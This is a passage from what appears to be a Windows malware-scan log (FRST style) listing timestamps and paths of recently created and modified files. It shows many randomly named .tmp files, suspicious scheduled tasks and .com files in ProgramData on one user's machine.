000069632 _____ C:\Users\Karin Hostetler\AppData\Roaming\KAJdHsx.tmp 2022-03-22 13:18 - 2022-03-17 08:21 - 000057344 _____ C:\Users\Karin Hostetler\AppData\Roaming\kaampdk.tmp 2022-03-22 13:12 - 2022-03-22 13:07 - 000069632 _____ C:\Users\Karin Hostetler\AppData\Roaming\c.pmfr..tmp 2022-03-22 13:12 - 2022-03-17 08:21 - 000057344 _____ C:\Users\Karin Hostetler\AppData\Roaming\FkyDzBg.tmp 2022-03-22 11:55 - 2022-03-23 08:25 - 000000000 ____D C:\Users\Karin Hostetler\AppData\Local\Microsoft Vision 2022-03-22 11:35 - 2022-03-17 08:21 - 000057344 _____ C:\Users\Karin Hostetler\AppData\Roaming\.yvbevo.tmp 2022-03-22 11:35 - 2022-03-11 20:38 - 000049152 _____ C:\Users\Karin Hostetler\AppData\Roaming\CqicpoE.tmp 2022-03-22 11:11 - 2022-03-17 08:21 - 000057344 _____ C:\Users\Karin Hostetler\AppData\Roaming\imec.rK.tmp 2022-03-22 11:11 - 2022-03-11 20:38 - 000049152 _____ C:\Users\Karin Hostetler\AppData\Roaming\.wB.u.k.tmp 2022-03-22 10:40 - 2022-03-22 10:40 - 000000000 ____D C:\Users\Karin Hostetler\AppData\Local\mbam 2022-03-22 10:34 - 2022-03-17 08:21 - 000057344 _____ C:\Users\Karin Hostetler\AppData\Roaming\x.fkmhm.tmp 2022-03-22 10:34 - 2022-03-11 20:38 - 000049152 _____ C:\Users\Karin Hostetler\AppData\Roaming\.AInoHs.tmp 2022-03-22 09:12 - 2022-03-17 08:21 - 000057344 _____ C:\Users\Karin Hostetler\AppData\Roaming\hHpH.vg.tmp 2022-03-22 09:12 - 2022-03-11 20:38 - 000049152 _____ C:\Users\Karin Hostetler\AppData\Roaming\.Fixosu.tmp 2022-03-22 07:50 - 2022-03-17 08:21 - 000057344 _____ C:\Users\Karin Hostetler\AppData\Roaming\As.e.Iq.tmp 2022-03-22 07:50 - 2022-03-11 20:38 - 000049152 _____ C:\Users\Karin Hostetler\AppData\Roaming\u.vBKhg.tmp 2022-03-22 06:28 - 2022-03-17 08:21 - 000057344 _____ C:\Users\Karin Hostetler\AppData\Roaming\FHm.CCw.tmp 2022-03-22 06:28 - 2022-03-11 20:38 - 000049152 _____ C:\Users\Karin Hostetler\AppData\Roaming\G.zIGwn.tmp 2022-03-22 05:50 - 2022-03-17 08:21 - 000057344 _____ C:\Users\Karin Hostetler\AppData\Roaming\uebnfhx.tmp 2022-03-22 05:50 - 2022-03-11 20:38 - 000049152 _____ C:\Users\Karin Hostetler\AppData\Roaming\FqFql.I.tmp 2022-03-22 05:30 - 2022-03-17 08:21 - 000057344 _____ C:\Users\Karin Hostetler\AppData\Roaming\vowws.H.tmp 2022-03-22 05:30 - 2022-03-11 20:38 - 000049152 _____ C:\Users\Karin Hostetler\AppData\Roaming\.BahC.h.tmp 2022-03-22 05:06 - 2022-03-17 08:21 - 000057344 _____ C:\Users\Karin Hostetler\AppData\Roaming\zBllBya.tmp 2022-03-22 05:06 - 2022-03-11 20:38 - 000049152 _____ C:\Users\Karin Hostetler\AppData\Roaming\qcmJyrv.tmp 2022-03-22 04:04 - 2022-03-17 08:21 - 000057344 _____ C:\Users\Karin Hostetler\AppData\Roaming\BcvEhIh.tmp 2022-03-22 04:04 - 2022-03-11 20:38 - 000049152 _____ C:\Users\Karin Hostetler\AppData\Roaming\hKKAJt..tmp 2022-03-22 03:51 - 2022-03-17 08:21 - 000057344 _____ C:\Users\Karin Hostetler\AppData\Roaming\H.FnrcA.tmp 2022-03-22 03:51 - 2022-03-11 20:38 - 000049152 _____ C:\Users\Karin Hostetler\AppData\Roaming\FcfgK.l.tmp 2022-03-22 03:44 - 2022-03-17 08:21 - 000057344 _____ C:\Users\Karin Hostetler\AppData\Roaming\JBAeesf.tmp 2022-03-22 03:44 - 2022-03-11 20:38 - 000049152 _____ C:\Users\Karin Hostetler\AppData\Roaming\.yvkw.y.tmp 2022-03-22 03:05 - 2022-03-17 08:21 - 000057344 _____ C:\Users\Karin Hostetler\AppData\Roaming\GyhgfDG.tmp 2022-03-22 03:05 - 2022-03-11 20:38 - 000049152 _____ C:\Users\Karin Hostetler\AppData\Roaming\rGHtFCn.tmp 2022-03-22 03:00 - 2022-03-17 08:21 - 000057344 _____ C:\Users\Karin Hostetler\AppData\Roaming\pzvEJ.c.tmp 2022-03-22 03:00 - 2022-03-11 20:38 - 000049152 _____ C:\Users\Karin Hostetler\AppData\Roaming\cxuionk.tmp 2022-03-22 02:22 - 2022-03-17 08:21 - 000057344 _____ C:\Users\Karin Hostetler\AppData\Roaming\zatwfvJ.tmp 2022-03-22 02:22 - 2022-03-11 20:38 - 000049152 _____ C:\Users\Karin Hostetler\AppData\Roaming\KaAzBzg.tmp 2022-03-22 01:46 - 2022-03-17 08:21 - 000057344 _____ C:\Users\Karin Hostetler\AppData\Roaming\zIBKqww.tmp 2022-03-22 01:46 - 2022-03-11 20:38 - 000049152 _____ C:\Users\Karin Hostetler\AppData\Roaming\EAyEynk.tmp 2022-03-22 01:00 - 2022-03-17 08:21 - 000057344 _____ C:\Users\Karin Hostetler\AppData\Roaming\BvqpwdK.tmp 2022-03-22 01:00 - 2022-03-11 20:38 - 000049152 _____ C:\Users\Karin Hostetler\AppData\Roaming\yc.Kam..tmp 2022-03-21 23:38 - 2022-03-17 08:21 - 000057344 _____ C:\Users\Karin Hostetler\AppData\Roaming\cbmkybA.tmp 2022-03-21 23:38 - 2022-03-11 20:38 - 000049152 _____ C:\Users\Karin Hostetler\AppData\Roaming\Io..gvn.tmp 2022-03-21 22:16 - 2022-03-17 08:21 - 000057344 _____ C:\Users\Karin Hostetler\AppData\Roaming\CrKgBBd.tmp 2022-03-21 22:16 - 2022-03-11 20:38 - 000049152 _____ C:\Users\Karin Hostetler\AppData\Roaming\tgIysyi.tmp 2022-03-21 20:54 - 2022-03-17 08:21 - 000057344 _____ C:\Users\Karin Hostetler\AppData\Roaming\EDhbFIz.tmp 2022-03-21 20:54 - 2022-03-11 20:38 - 000049152 _____ C:\Users\Karin Hostetler\AppData\Roaming\nGtAkFz.tmp 2022-03-21 20:37 - 2022-03-17 08:21 - 000057344 _____ C:\Users\Karin Hostetler\AppData\Roaming\vCkilCq.tmp 2022-03-21 20:37 - 2022-03-11 20:38 - 000049152 _____ C:\Users\Karin Hostetler\AppData\Roaming\EaBiAea.tmp 2022-03-21 19:32 - 2022-03-17 08:21 - 000057344 _____ C:\Users\Karin Hostetler\AppData\Roaming\CisKbHh.tmp 2022-03-21 19:32 - 2022-03-11 20:38 - 000049152 _____ C:\Users\Karin Hostetler\AppData\Roaming\.r.ubyg.tmp 2022-03-21 18:35 - 2022-03-17 08:21 - 000057344 _____ C:\Users\Karin Hostetler\AppData\Roaming\migEyFu.tmp 2022-03-21 18:35 - 2022-03-11 20:38 - 000049152 _____ C:\Users\Karin Hostetler\AppData\Roaming\.tyCkte.tmp 2022-03-21 18:32 - 2022-03-17 08:21 - 000057344 _____ C:\Users\Karin Hostetler\AppData\Roaming\EygEhJE.tmp 2022-03-21 18:32 - 2022-03-11 20:38 - 000049152 _____ C:\Users\Karin Hostetler\AppData\Roaming\Ja.AJly.tmp 2022-03-21 18:10 - 2022-03-17 08:21 - 000057344 _____ C:\Users\Karin Hostetler\AppData\Roaming\hgJmzHc.tmp 2022-03-21 18:10 - 2022-03-11 20:38 - 000049152 _____ C:\Users\Karin Hostetler\AppData\Roaming\lfjDy.A.tmp 2022-03-21 18:05 - 2022-03-17 08:21 - 000057344 _____ C:\Users\Karin Hostetler\AppData\Roaming\bwyFtJD.tmp 2022-03-21 18:05 - 2022-03-11 20:38 - 000049152 _____ C:\Users\Karin Hostetler\AppData\Roaming\d.KvBEk.tmp 2022-03-21 17:13 - 2022-03-17 08:21 - 000057344 _____ C:\Users\Karin Hostetler\AppData\Roaming\hGmrugl.tmp 2022-03-21 17:13 - 2022-03-17 08:21 - 000057344 _____ C:\Users\Karin Hostetler\AppData\Roaming\CFCbraa.tmp 2022-03-21 17:13 - 2022-03-11 20:38 - 000049152 _____ C:\Users\Karin Hostetler\AppData\Roaming\swhi.Fm.tmp 2022-03-21 17:13 - 2022-03-11 20:38 - 000049152 _____ C:\Users\Karin Hostetler\AppData\Roaming\GuyFxhj.tmp 2022-03-21 16:52 - 2022-03-17 08:21 - 000057344 _____ C:\Users\Karin Hostetler\AppData\Roaming\zkKIqmK.tmp 2022-03-21 16:52 - 2022-03-11 20:38 - 000049152 _____ C:\Users\Karin Hostetler\AppData\Roaming\oCGeaDq.tmp 2022-03-21 16:48 - 2022-03-17 08:21 - 000057344 _____ C:\Users\Karin Hostetler\AppData\Roaming\iewoixB.tmp 2022-03-21 16:48 - 2022-03-11 20:38 - 000049152 _____ C:\Users\Karin Hostetler\AppData\Roaming\IvocJvb.tmp 2022-03-21 16:47 - 2022-03-23 08:25 - 000003730 _____ C:\WINDOWS\system32\Tasks\microWord 2022-03-21 15:25 - 2022-03-21 15:25 - 000003768 _____ C:\WINDOWS\system32\Tasks\calendersw 2022-03-21 15:25 - 2020-10-14 07:54 - 000433152 _____ (Microsoft Corporation) C:\ProgramData\ESETNONU.com 2022-03-21 15:25 - 2019-12-07 05:10 - 000013312 _____ (Microsoft Corporation) C:\ProgramData\milon.com 2022-03-21 15:24 - 2019-12-07 05:10 - 000013312 _____ (Microsoft Corporation) C:\ProgramData\ddond.com 2022-03-08 22:28 - 2022-03-08 22:28 - 000011911 _____ C:\WINDOWS\system32\DrtmAuthTxt.wim 2022-03-08 22:27 - 2022-03-08 22:27 - 002254336 _____ C:\WINDOWS\system32\dwmscene.dll 2022-03-08 22:27 - 2022-03-08 22:27 - 000223744 _____ C:\WINDOWS\SysWOW64\TpmTool.exe 2022-03-08 22:26 - 2022-03-08 22:26 - 002260992 _____ C:\WINDOWS\system32\TextInputMethodFormatter.dll 2022-03-08 22:25 - 2022-03-08 22:25 - 000272896 _____ C:\WINDOWS\system32\TpmTool.exe 2022-03-08 21:33 - 2022-03-08 21:33 - 000000000 ___HD C:\$WinREAgent 2022-02-28 10:53 - 2022-02-28 10:56 - 000050176 _____ C:\Users\Karin Hostetler\Desktop\TV CHANNELL LISTINGS.xls ==================== One month (modified) ================== (If an entry is included in the fixlist, the file/folder will be moved.) 2022-03-23 08:57 - 2016-11-16 18:30 - 000000000 ____D C:\ProgramData\Temp 2022-03-23 08:53 - 2021-11-12 10:06 - 000000000 ____D C:\Users\Karin Hostetler\Desktop\Delete 2022-03-23 08:39 - 2019-12-07 05:14 - 000000000 ____D C:\ProgramData\regid.1991-06.com.microsoft 2022-03-23 08:29 - 2017-03-11 18:41 - 000000000 ____D C:\Program Files (x86)\Google 2022-03-23 08:23 - 2020-09-29 09:05 - 000000000 ____D C:\WINDOWS\system32\SleepStudy 2022-03-23 08:15 - 2019-03-04 15:13 - 000002081 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Acrobat Distiller DC.lnk 2022-03-23 08:15 - 2019-03-04 15:13 - 000002070 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Acrobat DC.lnk 2022-03-22 20:52 - 2018-05-18 13:03 - 000000000 ____D C:\Users\Karin Hostetler\AppData\Local\Host App Service 2022-03-22 14:41 - 2019-10-01 13:02 - 000000000 ___HD C:\Users\Public\Documents\AdobeGCData 2022-03-22 14:33 - 2020-09-29 09:21 - 000844670 _____ C:\WINDOWS\system32\PerfStringBackup.INI 2022-03-22 14:33 - 2019-12-07 05:13 - 000000000 ____D C:\WINDOWS\INF 2022-03-22 14:27 - 2020-09-29 09:37 - 000000006 ____H C:\WINDOWS\Tasks\SA.DAT 2022-03-22 14:27 - 2020-09-29 09:05 - 000008192 ___SH C:\DumpStack.log.tmp 2022-03-22 14:27 - 2019-12-07 05:14 - 000000000 ____D C:\WINDOWS\ServiceState 2022-03-22 14:26 - 2019-12-07 05:03 - 000524288 _____ C:\WINDOWS\system32\config\BBI 2022-03-22 14:26 - 2017-06-04 15:52 - 000065536 _____ C:\WINDOWS\system32\spu_storage.bin 2022-03-22 13:11 - 2019-12-07 05:14 - 000000000 ___HD C:\WINDOWS\ELAMBKUP 2022-03-22 13:11 - 2019-12-07 05:03 - 000032768 _____ C:\WINDOWS\system32\config\ELAM 2022-03-22 10:19 - 2017-11-27 10:47 - 000000507 _____ C:\WINDOWS\Brpfx04a.ini 2022-03-22 08:45 - 2017-05-09 21:00 - 000002103 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Acrobat Reader DC.lnk 2022-03-21 16:31 - 2017-03-11 18:47 - 000002268 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk 2022-03-19 09:56 - 2020-06-29 08:08 - 000002405 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Edge.lnk 2022-03-19 09:56 - 2019-12-07 05:14 - 000000000 ___HD C:\Program Files\WindowsApps 2022-03-19 09:56 - 2019-12-07 05:14 - 000000000 ____D C:\WINDOWS\AppReadiness 2022-03-14 19:26 - 2018-03-01 09:07 - 000000000 ____D C:\WINDOWS\system32\Drivers\wd 2022-03-14 09:03 - 2018-09-13 12:46 - 000015360 ____H C:\Users\Karin Hostetler\Desktop\photothumb.db 2022-03-11 21:51 - 2021-12-12 12:56 - 000003588 _____ C:\WINDOWS\system32\Tasks\OneDrive Reporting Task-S-1-5-21-1394640484-365018484-2708498470-1001 2022-03-11 21:51 - 2020-09-29 09:37 - 000003398 _____ C:\WINDOWS\system32\Tasks\OneDrive Standalone Update Task-S-1-5-21-1394640484-365018484-2708498470-1001 2022-03-11 21:51 - 2020-09-29 01:24 - 000002462 _____ C:\Users\Karin Hostetler\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\OneDrive.lnk 2022-03-11 19:13 - 2020-09-29 09:05 - 000490832 _____ C:\WINDOWS\system32\FNTCACHE.DAT 2022-03-11 19:08 - 2019-12-07 05:14 - 000000000 ___RD C:\WINDOWS\ImmersiveControlPanel 2022-03-11 19:08 - 2019-12-07 05:14 - 000000000 ____D C:\WINDOWS\SystemResources 2022-03-11 19:08 - 2019-12-07 05:14 - 000000000 ____D C:\WINDOWS\system32\WinBioPlugIns 2022-03-11 19:08 - 2019-12-07 05:14 - 000000000 ____D C:\WINDOWS\system32\oobe 2022-03-11 19:08 - 2019-12-07 05:14 - 000000000 ____D C:\WINDOWS\system32\migwiz 2022-03-11 19:08 - 2019-12-07 05:14 - 000000000 ____D C:\WINDOWS\PolicyDefinitions 2022-03-11 19:08 - 2019-12-07 05:14 - 000000000 ____D C:\WINDOWS\bcastdvr 2022-03-11 19:08 - 2019-12-07 05:03 - 000000000 ____D C:\WINDOWS\servicing 2022-03-08 23:49 - 2020-09-29 09:37 - 000003480 _____ C:\WINDOWS\system32\Tasks\MicrosoftEdgeUpdateTaskMachineUA 2022-03-08 23:49 - 2020-09-29 09:37 - 000003356 _____ C:\WINDOWS\system32\Tasks\MicrosoftEdgeUpdateTaskMachineCore 2022-03-08 22:47 - 2019-12-07 05:03 - 000000000 ____D C:\WINDOWS\CbsTemp 2022-03-08 22:25 - 2020-09-29 09:09 - 002877952 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PrintConfig.dll 2022-03-08 21:32 - 2021-02-19 17:53 - 000000000 ____D C:\Program Files\Microsoft Update Health Tools 2022-03-08 21:32 - 2017-03-12 12:22 - 000000000 ____D C:\WINDOWS\system32\MRT 2022-03-08 21:15 - 2017-03-12 12:22 - 145666720 ____C (Microsoft Corporation) C:\WINDOWS\system32\MRT.exe ==================== Files in the root of some directories ======== 2021-09-26 23:19 - 2021-09-26 23:20 - 000046009 __RSH () C:\Program Files (x86)\DLS8Uninstall.log 2017-03-11 19:04 - 2017-03-11 19:04 - 022762520 _____ (LastPass) C:\Program Files (x86)\Common Files\lpuninstall.exe 2022-03-22 10:34 - 2022-03-11 20:38 - 000049152 _____ () C:\Users\Karin Hostetler\AppData\Roaming\.AInoHs.tmp 2022-03-22 05:30 - 2022-03-11 20:38 - 000049152 _____ () C:\Users\Karin Hostetler\AppData\Roaming\.BahC.h.tmp 2022-03-23 00:14 - 2022-03-22 21:07 - 000069632 _____ () C:\Users\Karin Hostetler\AppData\Roaming\.DmrCyx.tmp 2022-03-23 05:42 - 2022-03-23 05:07 - 000069632 _____ () C:\Users\Karin Hostetler\AppData\Roaming\.EipzDA.tmp 2022-03-22 09:12 - 2022-03-11 20:38 - 000049152 _____ () C:\Users\Karin Hostetler\AppData\Roaming\.Fixosu.tmp 2022-03-22 18:46 - 2022-03-22 17:07 - 000069632 _____ () C:\Users\Karin Hostetler\AppData\Roaming\.gq.eEv.tmp 2022-03-21 19:32 - 2022-03-11 20:38 - 000049152 _____ () C:\Users\Karin Hostetler\AppData\Roaming\.r.ubyg.tmp 2022-03-21 18:35 - 2022-03-11 20:38 - 000049152 _____ () C:\Users\Karin Hostetler\AppData\Roaming\.tyCkte.tmp 2022-03-22 11:11 - 2022-03-11 20:38 - 000049152 _____ () C:\Users\Karin Hostetler\AppData\Roaming\.wB.u.k.tmp 2022-03-22 11:35 - 2022-03-17 08:21 - 000057344 _____ () C:\Users\Karin Hostetler\AppData\Roaming\.yvbevo.tmp 2022-03-22 03:44 - 2022-03-11 20:38 - 000049152 _____ () C:\Users\Karin Hostetler\AppData\Roaming\.yvkw.y.tmp 2022-03-22 20:05 - 2022-03-22 19:54 - 000069632 _____ () C:\Users\Karin Hostetler\AppData\Roaming\abF.FyJ.tmp 2022-03-22 20:05 - 2022-03-17 08:21 - 000057344 _____ () C:\Users\Karin Hostetler\AppData\Roaming\AfKprbo.tmp 2022-03-22 07:50 - 2022-03-17 08:21 - 000057344 _____ () C:\Users\Karin Hostetler\AppData\Roaming\As.e.Iq.tmp 2022-03-23 08:26 - 2022-03-17 08:21 - 000057344 _____ () C:\Users\Karin Hostetler\AppData\Roaming\B.mvKwd.tmp 2022-03-22 04:04 - 2022-03-17 08:21 - 000057344 _____ () C:\Users\Karin Hostetler\AppData\Roaming\BcvEhIh.tmp 2022-03-23 02:58 - 2022-03-17 08:21 - 000057344 _____ () C:\Users\Karin Hostetler\AppData\Roaming\bvcozKc.tmp 2022-03-22 01:00 - 2022-03-17 08:21 - 000057344 _____ () C:\Users\Karin Hostetler\AppData\Roaming\BvqpwdK.tmp 2022-03-21 18:05 - 2022-03-17 08:21 - 000057344 _____ () C:\Users\Karin Hostetler\AppData\Roaming\bwyFtJD.tmp 2022-03-22 13:12 - 2022-03-22 13:07 - 000069632 _____ () C:\Users\Karin Hostetler\AppData\Roaming\c.pmfr..tmp 2022-03-21 23:38 - 2022-03-17 08:21 - 000057344 _____ () C:\Users\Karin Hostetler\AppData\Roaming\cbmkybA.tmp 2022-03-21 17:13 - 2022-03-17 08:21 - 000057344 _____ () C:\Users\Karin Hostetler\AppData\Roaming\CFCbraa.tmp 2022-03-21 19:32 - 2022-03-17 08:21 - 000057344 _____ () C:\Users\Karin Hostetler\AppData\Roaming\CisKbHh.tmp 2022-03-22 11:35 - 2022-03-11 20:38 - 000049152 _____ () C:\Users\Karin Hostetler\AppData\Roaming\CqicpoE.tmp 2022-03-21 22:16 - 2022-03-17 08:21 - 000057344 _____ () C:\Users\Karin Hostetler\AppData\Roaming\CrKgBBd.tmp 2022-03-22 03:00 - 2022-03-11 20:38 - 000049152 _____ () C:\Users\Karin Hostetler\AppData\Roaming\cxuionk.tmp 2022-03-21 18:05 - 2022-03-11 20:38 - 000049152 _____ () C:\Users\Karin Hostetler\AppData\Roaming\d.KvBEk.tmp 2022-03-22 14:12 - 2022-03-17 08:21 - 000057344 _____ () C:\Users\Karin Hostetler\AppData\Roaming\DgkIlaH.tmp 2022-03-21 20:37 - 2022-03-11 20:38 - 000049152 _____ () C:\Users\Karin Hostetler\AppData\Roaming\EaBiAea.tmp 2022-03-22 01:46 - 2022-03-11 20:38 - 000049152 _____ () C:\Users\Karin Hostetler\AppData\Roaming\EAyEynk.tmp 2022-03-21 20:54 - 2022-03-17 08:21 - 000057344 _____ () C:\Users\Karin Hostetler\AppData\Roaming\EDhbFIz.tmp 2022-03-21 18:32 - 2022-03-17 08:21 - 000057344 _____ () C:\Users\Karin Hostetler\AppData\Roaming\EygEhJE.tmp 2022-03-22 03:51 - 2022-03-11 20:38 - 000049152 _____ () C:\Users\Karin Hostetler\AppData\Roaming\FcfgK.l.tmp 2022-03-22 22:52 - 2022-03-17 08:21 - 000057344 _____ () C:\Users\Karin Hostetler\AppData\Roaming\fhIqKrG.tmp 2022-03-22 06:28 - 2022-03-17 08:21 - 000057344 _____ () C:\Users\Karin Hostetler\AppData\Roaming\FHm.CCw.tmp 2018-01-16 15:31 - 2018-01-16 15:38 - 000321421 _____ () C:\Users\Karin Hostetler\AppData\Roaming\FileDrTool.log 2022-03-23 07:04 - 2022-03-23 05:07 - 000069632 _____ () C:\Users\Karin Hostetler\AppData\Roaming\Fkhvfuv.tmp 2022-03-22 13:12 - 2022-03-17 08:21 - 000057344 _____ () C:\Users\Karin Hostetler\AppData\Roaming\FkyDzBg.tmp 2022-03-22 17:24 - 2022-03-17 08:21 - 000057344 _____ () C:\Users\Karin Hostetler\AppData\Roaming\flwKCyx.tmp 2022-03-23 05:42 - 2022-03-17 08:21 - 000057344 _____ () C:\Users\Karin Hostetler\AppData\Roaming\FooEDIz.tmp 2022-03-22 05:50 - 2022-03-11 20:38 - 000049152 _____ () C:\Users\Karin Hostetler\AppData\Roaming\FqFql.I.tmp 2022-03-22 06:28 - 2022-03-11 20:38 - 000049152 _____ () C:\Users\Karin Hostetler\AppData\Roaming\G.zIGwn.tmp 2022-03-23 01:36 - 2022-03-17 08:21 - 000057344 _____ () C:\Users\Karin Hostetler\AppData\Roaming\gelfCgB.tmp 2022-03-22 16:02 - 2022-03-22 15:31 - 000069632 _____ () C:\Users\Karin Hostetler\AppData\Roaming\GK.xB.H.tmp 2022-03-21 17:13 - 2022-03-11 20:38 - 000049152 _____ () C:\Users\Karin Hostetler\AppData\Roaming\GuyFxhj.tmp 2022-03-22 03:05 - 2022-03-17 08:21 - 000057344 _____ () C:\Users\Karin Hostetler\AppData\Roaming\GyhgfDG.tmp 2022-03-22 21:30 - 2022-03-22 21:07 - 000069632 _____ () C:\Users\Karin Hostetler\AppData\Roaming\h.dA..r.tmp 2022-03-22 03:51 - 2022-03-17 08:21 - 000057344 _____ () C:\Users\Karin Hostetler\AppData\Roaming\H.FnrcA.tmp 2022-03-22 18:20 - 2022-03-22 17:07 - 000069632 _____ () C:\Users\Karin Hostetler\AppData\Roaming\hc.Ekso.tmp 2022-03-22 22:52 - 2022-03-22 21:07 - 000069632 _____ () C:\Users\Karin Hostetler\AppData\Roaming\hdpl.A..tmp 2022-03-21 18:10 - 2022-03-17 08:21 - 000057344 _____ () C:\Users\Karin Hostetler\AppData\Roaming\hgJmzHc.tmp 2022-03-21 17:13 - 2022-03-17 08:21 - 000057344 _____ () C:\Users\Karin Hostetler\AppData\Roaming\hGmrugl.tmp 2022-03-22 16:02 - 2022-03-17 08:21 - 000057344 _____ () C:\Users\Karin Hostetler\AppData\Roaming\hHKvy.s.tmp 2022-03-22 09:12 - 2022-03-17 08:21 - 000057344 _____ () C:\Users\Karin Hostetler\AppData\Roaming\hHpH.vg.tmp 2022-03-22 04:04 - 2022-03-11 20:38 - 000049152 _____ () C:\Users\Karin Hostetler\AppData\Roaming\hKKAJt..tmp 2022-03-23 04:55 - 2022-03-23 01:07 - 000069632 _____ () C:\Users\Karin Hostetler\AppData\Roaming\ianksBp.tmp 2022-03-21 16:48 - 2022-03-17 08:21 - 000057344 _____ () C:\Users\Karin Hostetler\AppData\Roaming\iewoixB.tmp 2022-03-23 07:04 - 2022-03-17 08:21 - 000057344 _____ () C:\Users\Karin Hostetler\AppData\Roaming\IlxrjIs.tmp 2022-03-22 11:11 - 2022-03-17 08:21 - 000057344 _____ () C:\Users\Karin Hostetler\AppData\Roaming\imec.rK.tmp 2022-03-21 23:38 - 2022-03-11 20:38 - 000049152 _____ () C:\Users\Karin Hostetler\AppData\Roaming\Io..gvn.tmp 2022-03-21 16:48 - 2022-03-11 20:38 - 000049152 _____ () C:\Users\Karin Hostetler\AppData\Roaming\IvocJvb.tmp 2022-03-21 18:32 - 2022-03-11 20:38 - 000049152 _____ () C:\Users\Karin Hostetler\AppData\Roaming\Ja.AJly.tmp 2022-03-22 03:44 - 2022-03-17 08:21 - 000057344 _____ () C:\Users\Karin Hostetler\AppData\Roaming\JBAeesf.tmp 2022-03-22 20:08 - 2022-03-22 19:54 - 000069632 _____ () C:\Users\Karin Hostetler\AppData\Roaming\jKsc.Db.tmp 2022-03-22 13:18 - 2022-03-17 08:21 - 000057344 _____ () C:\Users\Karin Hostetler\AppData\Roaming\kaampdk.tmp 2022-03-22 02:22 - 2022-03-11 20:38 - 000049152 _____ () C:\Users\Karin Hostetler\AppData\Roaming\KaAzBzg.tmp 2022-03-22 13:18 - 2022-03-22 13:07 - 000069632 _____ () C:\Users\Karin Hostetler\AppData\Roaming\KAJdHsx.tmp 2022-03-22 13:44 - 2022-03-17 08:21 - 000057344 _____ () C:\Users\Karin Hostetler\AppData\Roaming\kawiKkt.tmp 2022-03-22 18:46 - 2022-03-17 08:21 - 000057344 _____ () C:\Users\Karin Hostetler\AppData\Roaming\Kjvon.z.tmp 2022-03-21 18:10 - 2022-03-11 20:38 - 000049152 _____ () C:\Users\Karin Hostetler\AppData\Roaming\lfjDy.A.tmp 2022-03-23 04:55 - 2022-03-17 08:21 - 000057344 _____ () C:\Users\Karin Hostetler\AppData\Roaming\ljesr.e.tmp 2022-03-21 18:35 - 2022-03-17 08:21 - 000057344 _____ () C:\Users\Karin Hostetler\AppData\Roaming\migEyFu.tmp 2022-03-23 08:26 - 2022-03-23 07:55 - 000069632 _____ () C:\Users\Karin Hostetler\AppData\Roaming\myciaB..tmp 2022-03-21 20:54 - 2022-03-11 20:38 - 000049152 _____ () C:\Users\Karin Hostetler\AppData\Roaming\nGtAkFz.tmp 2022-03-21 16:52 - 2022-03-11 20:38 - 000049152 _____ () C:\Users\Karin Hostetler\AppData\Roaming\oCGeaDq.tmp 2022-03-23 02:58 - 2022-03-23 01:07 - 000069632 _____ () C:\Users\Karin Hostetler\AppData\Roaming\pAsnGil.tmp 2022-03-22 17:24 - 2022-03-22 17:07 - 000069632 _____ () C:\Users\Karin Hostetler\AppData\Roaming\pddmtsw.tmp 2022-03-22 21:30 - 2022-03-17 08:21 - 000057344 _____ () C:\Users\Karin Hostetler\AppData\Roaming\pF.Fltn.tmp 2022-03-22 03:00 - 2022-03-17 08:21 - 000057344 _____ () C:\Users\Karin Hostetler\AppData\Roaming\pzvEJ.c.tmp 2017-03-12 13:05 - 2021-07-20 16:29 - 000228094 _____ () C:\Users\Karin Hostetler\AppData\Roaming\QBFileDrTool.log 2018-07-10 13:37 - 2022-01-26 12:42 - 002581623 _____ () C:\Users\Karin Hostetler\AppData\Roaming\QBFileDrTool_DESKTOP-ID6UD18.log 2022-03-22 05:06 - 2022-03-11 20:38 - 000049152 _____ () C:\Users\Karin Hostetler\AppData\Roaming\qcmJyrv.tmp 2020-02-05 01:50 - 2021-09-09 06:40 - 000000043 _____ () C:\Users\Karin Hostetler\AppData\Roaming\restoreulip.ini 2022-03-22 03:05 - 2022-03-11 20:38 - 000049152 _____ () C:\Users\Karin Hostetler\AppData\Roaming\rGHtFCn.tmp 2022-03-22 13:44 - 2022-03-22 13:07 - 000069632 _____ () C:\Users\Karin Hostetler\AppData\Roaming\rGjizBd.tmp 2022-03-21 17:13 - 2022-03-11 20:38 - 000049152 _____ () C:\Users\Karin Hostetler\AppData\Roaming\swhi.Fm.tmp 2022-03-21 22:16 - 2022-03-11 20:38 - 000049152 _____ () C:\Users\Karin Hostetler\AppData\Roaming\tgIysyi.tmp 2022-03-22 07:50 - 2022-03-11 20:38 - 000049152 _____ () C:\Users\Karin Hostetler\AppData\Roaming\u.vBKhg.tmp 2022-03-22 05:50 - 2022-03-17 08:21 - 000057344 _____ () C:\Users\Karin Hostetler\AppData\Roaming\uebnfhx.tmp 2022-03-23 00:14 - 2022-03-17 08:21 - 000057344 _____ () C:\Users\Karin Hostetler\AppData\Roaming\uhhsnBd.tmp 2022-03-23 01:36 - 2022-03-23 01:07 - 000069632 _____ () C:\Users\Karin Hostetler\AppData\Roaming\vacfsmG.tmp 2022-03-21 20:37 - 2022-03-17 08:21 - 000057344 _____ () C:\Users\Karin Hostetler\AppData\Roaming\vCkilCq.tmp 2022-03-22 05:30 - 2022-03-17 08:21 - 000057344 _____ () C:\Users\Karin Hostetler\AppData\Roaming\vowws.H.tmp 2022-03-22 10:34 - 2022-03-17 08:21 - 000057344 _____ () C:\Users\Karin Hostetler\AppData\Roaming\x.fkmhm.tmp 2022-03-22 14:12 - 2022-03-22 13:07 - 000069632 _____ () C:\Users\Karin Hostetler\AppData\Roaming\xbfAl.r.tmp 2022-03-22 01:00 - 2022-03-11 20:38 - 000049152 _____ () C:\Users\Karin Hostetler\AppData\Roaming\yc.Kam..tmp 2022-03-22 20:08 - 2022-03-17 08:21 - 000057344 _____ () C:\Users\Karin Hostetler\AppData\Roaming\ymybaBG.tmp 2022-03-22 02:22 - 2022-03-17 08:21 - 000057344 _____ () C:\Users\Karin Hostetler\AppData\Roaming\zatwfvJ.tmp 2022-03-22 05:06 - 2022-03-17 08:21 - 000057344 _____ () C:\Users\Karin Hostetler\AppData\Roaming\zBllBya.tmp 2022-03-22 01:46 - 2022-03-17 08:21 - 000057344 _____ () C:\Users\Karin Hostetler\AppData\Roaming\zIBKqww.tmp 2022-03-21 16:52 - 2022-03-17 08:21 - 